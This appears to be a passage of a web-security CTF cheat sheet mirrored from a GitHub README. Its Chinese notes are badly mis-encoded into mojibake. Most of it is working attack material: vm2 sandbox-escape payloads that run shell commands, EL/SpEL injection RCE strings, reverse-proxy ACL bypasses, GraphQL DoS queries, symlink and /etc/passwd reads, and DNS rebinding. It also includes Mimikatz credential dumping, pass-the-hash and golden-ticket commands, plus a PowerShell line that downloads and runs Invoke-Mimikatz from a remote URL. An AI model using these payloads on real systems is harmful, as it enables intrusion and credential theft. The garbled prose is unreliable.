/WebForm/pro/(S(X))tected/target1.aspx/(S(X))//WebForm/b/(S(X))in/target2.aspx/(S(X))/
- Example
- MidnightSun CTF 2024 - ASPowerTools
/(S(x))/b/(S(x))in/ASPowerTools.dll/(S(X))/prot/(S(X))ected/login.aspx
- MidnightSun CTF 2024 - ASPowerTools
- ref:
- CVE-2023-36899
-
NodeJS unicode failure
- å §é¨ä½¿ç¨ UCS-2 編碼
NN=>..ï¼®å³\xff\x2e- è½åææ¨æ£ç¬¬ä¸å Byte
-
ç¹æ®ç CRLF Injection ç¹é
%E5%98%8A- åå§ç Unicode 碼çº
U+560A - raw bytes:
0x56,0x0A
-
MySQL utf8 v.s. utf8mb4
- MySQL utf8 編碼åªæ¯æ´ 3 bytes
- è¥å° 4 bytes ç utf8mb4 æå ¥ utf8 ä¸ï¼å¨ non strict 模å¼ä¸æ被æªæ·
- CVE-2015-3438 WordPress Cross-Site Scripting Vulnerability
-
Proxy ç¸é
- Path parameters
- Tomcat & Jetty:
/path;param/abcd=> `/path/abcd - WebLogic & WildFly:
/path;param/abcd=>/path
- Tomcat & Jetty:
- Nginx + Tomcat
..;- æ
å¢: Nginx -> Tomcat, Nginx deny
/manager/docs/..;/manager/html- Nginx:
/docs/..;/manager/html - Tomcat:
/manager/html
- Nginx:
- æ
å¢: Nginx -> Tomcat, Nginx deny
/console/(location ~* /console/)/..;/console;/flag- Nginx:
/..;/console;/flag - Tomcat:
/console/flag
- Nginx:
- Nginx + Apache
- æ
å¢: Nginx -> Apache, Nginx deny
/adminproxy_pass http://apache(No trailing slashï¼ä»¥åå§è³æéå°å¾ç«¯)/admin//../flag- Nginx:
/flag - Apache:
/admin/flag
- Nginx:
- æ
å¢: Nginx -> Apache, Nginx deny
- Nginx + WebLogic
- æ
å¢: Nginx -> WebLogic, Nginx deny
/consoleproxy_pass http://weblogic;- Nginx:
/ - WebLogic:
/console
- Nginx:
/#/../console
- æ
å¢: Nginx -> WebLogic, Nginx deny
- Nginx + Gunicorn
- ç¹é»åå®è¦å
- Nginx deny
/admin /admin/key\x09HTTP/1.1/../../../- Nginx:
/ - Gunicorn:
/admin/key
- Nginx:
- Nginx æ°çæ¬å·²ä¿®å¾©
- Example:
- Nginx deny
- ç¹é»åå®è¦å
- Nginx + Swift
- Example: Line CTF 2024 - zipviewer-version-clown
- Nginx 大å°å¯«ææï¼Swift ä¸ææ
- ç¹ Rate limit
- Example: Line CTF 2024 - zipviewer-version-clown
- Haproxy + Caddy
- Haproxy:
keep-alive+CONNECT+ 2xx statusï¼æè®å ¶èæ¼ tunnel modeï¼ä¸æ¡ç¨ä»»ä½ rules - Cadday: ç¨ normalized path ä¾ matchingï¼ä½éåºçå»ä¸æ¯ normalized path
- Example: SecurityFest CTF 2022 - tunnelvision
- Haproxy:
- ref: https://github.com/GrrrDog/weird_proxies/tree/master
- Path parameters
-
Gunicorn
SCRIPT_NAMESCRIPT_NAMEå¯ä»¥æ¹è® base path- ç¶
SCRIPT_NAME=testï¼/a/b/test/flag=>/flag
- ç¶
- gunicorn ç
SCRIPT_NAMEå¯ä»¥éé HTTP Header è¨å®SCRIPT_NAME: a- åé¢å¦ææ Proxyï¼ä¾å¦ Nginxï¼åè¦éå
underscores_in_headersæè½å 許 header ä¸ç_
- Example: CSAW 2021 - gatekeeping
-
Nginx internalç¹é
X-Accel-Redirect- Document
- Example:
- Olympic CTF 2014 - CURLing
- MidnightSun CTF 2019 - bigspin
- PBCTF 2023 - Makima
-
Nginx ç®éç©¿è¶æ¼æ´
- 常è¦æ¼ Nginx å Reverse Proxy ççæ³
location /files { alias /home/ }- å çº
/filesæ²æå ä¸çµå°¾/ï¼è/home/æ - æ以
/files../å¯ä»¥è¨ªåä¸å±¤ç®é
-
Nginx add_header
- é è¨ç¶ repsponse æ¯ 200, 201, 204, 206, 301, 302, 303, 304, 307, or 308 æï¼
add_headerææè¨å® header - e.g. Codegate 2020 - CSP
- é è¨ç¶ repsponse æ¯ 200, 201, 204, 206, 301, 302, 303, 304, 307, or 308 æï¼
-
Nginx $url CRLF Injection
$uriæ¯è§£ç¢¼å¾çè«æ±è·¯å¾ï¼å¯è½å å«æè¡ï¼ææ©æå°è´ CRLF Injection- ææ¹ç¨
$request_uri
- ææ¹ç¨
- Example: VolgaCTF 2021 - Static Site
proxy_pass https://volga-static-site.s3.amazonaws.com$uri;- CRLF Injection èæ S3 Bucket ç Host headerï¼æ§ Response å §å®¹å XSS
-
Javascript 大å°å¯«ç¹æ§
"ı".toUpperCase() == 'I'"Å¿".toUpperCase() == 'S'"âª".toLowerCase() == 'k'- Reference
-
Javascript replace ç¹æ§
- replace string ä¸å¯ä»¥ä½¿ç¨
$
> "123456".replace("34", "xx") '12xx56' > "123456".replace("34", "$`") '121256' > "123456".replace("34", "$&") '123456' > "123456".replace("34", "$'") '125656' > "123456".replace("34", "$$") '12$56'- Example
- replace string ä¸å¯ä»¥ä½¿ç¨
-
Javascript Proxy
- doc
- å試åå¾è¢« Proxy ä¿è·ä½ç flag:
var p = new Proxy({flag: window.flag || 'flag'}, { get: () => 'nope' } - 解æ³:
Object.getOwnPropertyDescriptor(p, 'flag') - Example
-
Node.js ç®éç©¿è¶æ¼æ´
- CVE-2017-14849
- å½±é¿: 8.5.0 ç
/static/../../../foo/../../../../etc/passwd
-
Node.js vm escape
const process = this.constructor.constructor('return this.process')();process.mainModule.require('child_process').execSync('whoami').toString()- CONFidence CTF 2020 - TempleJS
- Only allow
/^[a-zA-Z0-9 ${}`]+$/g Function`a${`return constructor`}{constructor}` `${constructor}` `return flag` ``
- Only allow
-
Node.js vm2 escape
- CVE-2019-10761
- vm2 <= 3.6.10
- CVE-2021-23449
- vm2 <= 3.9.4
let res = import('./foo.js') res.toString.constructor("return this")().process.mainModule.require("child_process").execSync("whoami").toString(); - CVE-2023-29199
- vm2 <= 3.9.15
aVM2_INTERNAL_TMPNAME = {}; function stack() { new Error().stack; stack(); } try { stack(); } catch (a$tmpname) { a$tmpname.constructor.constructor('return process')().mainModule .require('child_process') .execSync('echo "flag is here" > flag'); } - CVE-2023-30547
- vm2 <= 3.9.16
err = {}; const handler = { getPrototypeOf(target) { (function stack() { new Error().stack; stack(); })(); } }; const proxiedErr = new Proxy(err, handler); try { throw proxiedErr; } catch ({constructor: c}) { c.constructor('return process')().mainModule.require('child_process').execSync('touch pwned'); } - CVE-2023-32314
- vm2 <= 3.9.17
const err = new Error(); err.name = { toString: new Proxy(() => "", { apply(target, thiz, args) { const process = args.constructor.constructor("return process")(); throw process.mainModule.require("child_process").execSync("whoami").toString(); }, }), }; try { err.stack; } catch (stdout) { stdout; } - CVE-2023-37466
- vm2 <= 3.9.19
async function fn() { (function stack() { new Error().stack; stack(); })(); } p = fn(); p.constructor = { [Symbol.species]: class FakePromise { constructor(executor) { executor( (x) => x, (err) => { return err.constructor.constructor('return process')().mainModule.require('child_process').execSync('touch 123'); } ) } } }; p.then(); - vm2 is officially deprecated
- CVE-2019-10761
-
Apache Tomcat Session æ縱æ¼æ´
- é è¨ session ç¯ä¾é é¢
/examples/servlets /servlet/SessionExample - å¯ä»¥ç´æ¥å° Session å¯«å ¥
- é è¨ session ç¯ä¾é é¢
-
polyglot image + .htaccess
- XBM æ ¼å¼æå®ç¾©å¨
exif_imagetype()ä¸ - 符å
.htaccessæ ¼å¼ - Insomnihack CTF
#define gg_width 1337 #define gg_height 1337 AddType application/x-httpd-php .asp - XBM æ ¼å¼æå®ç¾©å¨
-
AutoBinding / Mass Assignment
- Mass_Assignment_Cheat_Sheet
- Spring MVC
@ModelAttribute- æå° Client 端å³ä¾çåæ¸ (GET/POST) ç¶å®å°æå® Object ä¸ï¼ä¸¦èªåå°æ¤ Object å å° ModelMap ä¸
- Example
@RequestMapping(value = "/home", method = RequestMethod.GET) public String home(@ModelAttribute User user, Model model) { if (showSecret){ model.addAttribute("firstSecret", firstSecret); } return "home"; }- Example 2:
- Example 3: VolgaCTF 2019 - shop
-
EL Injection / SpEL Injection
- EL = Expression Language, SpEL = Spring Expression Language
- Some payload
${"a".toString()}${"".getClass()}${applicationScope}${sessionScope.toString()}${pageContext.request.getSession().setAttribute("admin", true)}${T(java.lang.Runtime).getRuntime().exec("<my command here>")}${Class.forName('java.lang.Runtime').getRuntime().invoke(null).exec(<RCE>).getInputStream().read()}${"".getClass().forName("java.lang.Runtime").getMethods()[6].invoke("".getClass().forName("java.lang.Runtime")).exec("calc.exe")}${request.getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("js").eval("java.lang.Runtime.getRuntime().exec(\\\"ping x.x.x.x\\\")"))}
- Example
-
GraphQL
- è³è¨æ´©æ¼
- åºæ¬æ¥è©¢
- æ¥è©¢åå¨çé¡å:
{ __schema { types { name } } }{__schema{types{name,fields{name}}}}
- æ¥è©¢ä¸åé¡åææå段:
{ __type (name: "Query") { name fields { name type { name kind ofType { name kind } } } } }{__schema{types{name,fields{name,args{name,description,type{name,kind,ofType{name, kind}}}}}}}- æåææé¡åãä»çå段ãåæ¸ä»¥ååæ¸é¡å
- å¯ä»¥è§å¯ä¸äºææå段ï¼å¦: password, email, token, session, secretkey, ... ç
- éé Introspection ä¾æ schema:
fragment+FullType+on+__Type+{++kind++name++description++fields(includeDeprecated%3a+true)+{++++name++++description++++args+{++++++...InputValue++++}++++type+{++++++...TypeRef++++}++++isDeprecated++++deprecationReason++}++inputFields+{++++...InputValue++}++interfaces+{++++...TypeRef++}++enumValues(includeDeprecated%3a+true)+{++++name++++description++++isDeprecated++++deprecationReason++}++possibleTypes+{++++...TypeRef++}}fragment+InputValue+on+__InputValue+{++name++description++type+{++++...TypeRef++}++defaultValue}fragment+TypeRef+on+__Type+{++kind++name++ofType+{++++kind++++name++++ofType+{++++++kind++++++name++++++ofType+{++++++++kind++++++++name++++++++ofType+{++++++++++kind++++++++++name++++++++++ofType+{++++++++++++kind++++++++++++name++++++++++++ofType+{++++++++++++++kind++++++++++++++name++++++++++++++ofType+{++++++++++++++++kind++++++++++++++++name++++++++++++++}++++++++++++}++++++++++}++++++++}++++++}++++}++}}query+IntrospectionQuery+{++__schema+{++++queryType+{++++++name++++}++++mutationType+{++++++name++++}++++types+{++++++...FullType++++}++++directives+{++++++name++++++description++++++locations++++++args+{++++++++...InputValue++++++}++++}++}}
- æ¥è©¢åå¨çé¡å:
- Suggestion
- ç¶è¼¸å
¥ä¸åæªç¥çkeywordï¼Graphql backend æ建è°æ£ç¢ºçkeyword
"message": "Cannot query field \"one\" on type \"Query\". Did you mean \"node\"?",
- ééåå ¸æªå»brute-force
- ç¶è¼¸å
¥ä¸åæªç¥çkeywordï¼Graphql backend æ建è°æ£ç¢ºçkeyword
- é¯èª¤è¨æ¯
- å¯ä»¥ééé¯èª¤è¨æ¯åå¾æç¨è³è¨
{__schema}{}{somerandomshit}
- Graphene-Django DEBUG
- ééæ·»å
__debugä¾åå¾è©³ç´°è³è¨ï¼ä¾å¦ sql å·è¡èªå¥
- ééæ·»å
- åºæ¬æ¥è©¢
- Batch query
- å¯ä»¥éé Array-based query ä¸æ¬¡é好幾åè«æ±
- Apollo GraphQL é è¨ä¸åç¨ Array Batching
- 常è¦æ å¢ï¼Password brute-force, Rate limit bypass, DoS
[{ query: 'query { book(id: 1) { __typename } }' },{ query: 'query { book(id: 1) { __typename } }' }]- JSON list based batching ä¸è½ç¨æï¼å¯ä»¥å試 Query name based batching
{"query": "query { kaibro: Query { meow } kaibro1: Query { meow } }"}
- Example:
- CSRF
- GET-based
/graphql?query=query+%7B+a+%7D
- POST-based
- content-type æ¹
x-www-form-urlencodedä»å¯å·è¡ - Example: Express-GraphQL, Portswigger's lab
- content-type æ¹
- GET-based
- Query Depth Attack
- æªé»æç話ï¼å®¹æé æDoS
- Example:
query { books { title author { title books { title author { ... } } } } }
- Alias overloading
- Example:
query { book(id: 1) { __typename alias: __typename alias2: __typename alias3: __typename alias4: __typename } }
- Example:
- Tool
- graphw00f (fingerprinting)
- graphquail
- GraphQLmap
- ...
- Example:
- è³è¨æ´©æ¼
-
HTTP2 Push
- Server èªå·± push æ±è¥¿åä¾ (e.g. CSS/JS file)
- e.g. ALLES CTF 2020 - Push
- Chrome Net Export tool
-
Symlink
ln -s ../../../../../../etc/passwd kaibro.linkzip --symlink bad.zip kaibro.link
-
curl trick
curl 'fi[k-m]e:///etc/passwdcurl '{asd,bb}'- Example: N1CTF 2021 - Funny_web
-
tcpdump
-iæå®ç¶²å¡ï¼ä¸æå®åç£æ§ææ網å¡-sé»èªåªæ96bytesï¼å¯ä»¥-sæå®æ´å¤§æ¸å¼-wæå®è¼¸åºæªhostæå®ä¸»æ©(ip or domain)dst,srcä¾æºæç®ç端portæå®ç«¯å£tcp,udp,icmpæå®åè°- example
- ä¾æº192.168.1.34ä¸ç®ç端å£çº80
tcpdump -i eth0 src 192.168.1.34 and dst port 80
- ä¾æº192.168.1.34ä¸ç®ç端å£æ¯22æ3389
tcpdump -i eth0 'src 192.168.1.34 and (dst port 22 or 3389)'
- ä¿åæªæ¡ï¼å¯ä»¥å¾çºç¨wiresharkåæ
tcpdump -i eth0 src kaibro.tw -w file.cap
- ä¾æº192.168.1.34ä¸ç®ç端å£çº80
Tool & Online Website
Information gathering
Hash Crack
å ¶å®
-
- php eval
-
https://github.com/denny0223/scrabble
- git
-
https://github.com/lijiejie/ds_store_exp
- .DS_Store
-
https://github.com/kost/dvcs-ripper
- git / svn / hg / cvs ...
-
unicode converter
-
PHPæ··æ· / å å¯
-
https://github.com/Pgaijin66/XSS-Payloads/blob/master/payload.txt
- XSS Payloads
-
DNSLog
-
DNS rebinding
- rebind.network
-
# butit still works A.192.168.1.1.forever.rebind.network #alternate between localhost and 10.0.0.1 forever A.127.0.0.1.1time.10.0.0.1.1time.repeat.rebind.network #first respond with 192.168.1.1 then 192.168.1.2. Now respond 192.168.1.3forever. A.192.168.1.1.1time.192.168.1.2.2times.192.168.1.3.forever.rebind.network #respond with 52.23.194.42 the first time, then whatever `whonow--default-address` # isset to forever after that (default: 127.0.0.1) A.52.23.194.42.1time.rebind.network
-
- rbndr.us
36573657.7f000001.rbndr.us
- Example
- rebind.network
-
https://r12a.github.io/apps/encodings/
- Encoding converter
-
Mimikatz
- æå¯ç¢¼
mimikatz.exe privilege::debug sekurlsa::logonpasswords full exit >> log.txt- powershell ç¡æ件:
powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds"
- Pass The Hash
sekurlsa::pth /user:Administrator /domain:kaibro.local /ntlm:cc36cf7a8514893efccd332446158b1asekurlsa::pth /user:Administrator /domain:kaibro.local /aes256:b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9sekurlsa::pth /user:Administrator /domain:kaibro.local /ntlm:cc36cf7a8514893efccd332446158b1a /aes256:b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9
- TGT
kerberos::tgt(Displays informations about the TGT of the current session)
- List / Export Kerberos tickets of all sessions
sekurlsa::tickets /export
- Pass The Ticket
kerberos::ptt Administrator@krbtgt-KAIBRO.LOCAL.kirbi
- Golden
- generate the TGS with NTLM:
kerberos::golden /domain:<domain_name>/sid:<domain_sid> /rc4:<ntlm_hash> /user:<user_name> /service:<service_name> /target:<service_machine_hostname> - generate the TGS with AES 128 key:
kerberos::golden /domain:<domain_name>/sid:<domain_sid> /aes128:<krbtgt_aes128_key> /user:<user_name> /service:<service_name> /target:<service_machine_hostname> - generate the TGS with AES 256 key:
kerberos::golden /domain:<domain_name>/sid:<domain_sid> /aes256:<krbtgt_aes256_key> /user:<user_name> /service:<service_name> /target:<service_machine_hostname>
- generate the TGS with NTLM:
- Purge
kerberos::purge(Purges all tickets of the current session)
- æå¯ç¢¼
-
WASM
Contributing
Welcome to open Pull Request
OR
Top Related Projects
60,720
A list of useful payloads and bypass for Web Application Security and Pentest/CTF
57,590
SecLists is the security tester's companion. It's a collection of multiple types of lists used during security assessments, collected in one place. List types include usernames, passwords, URLs, sensitive data patterns, fuzzing payloads, web shells, and many more.
27,866
The OWASP Cheat Sheet Series was created to provide a concise collection of high value information on specific application security topics.
5,837
A list of interesting payloads, tips and tricks for bug bounty hunters.
4,930
Penetration Testing Reference Bank - OSCP / PTP & PTX Cheatsheet
4,802
Awesome XSS stuff
Convert designs to code with AI
Introducing Visual Copilot: A new AI model to turn Figma designs to high quality code using your components.
Try Visual Copilot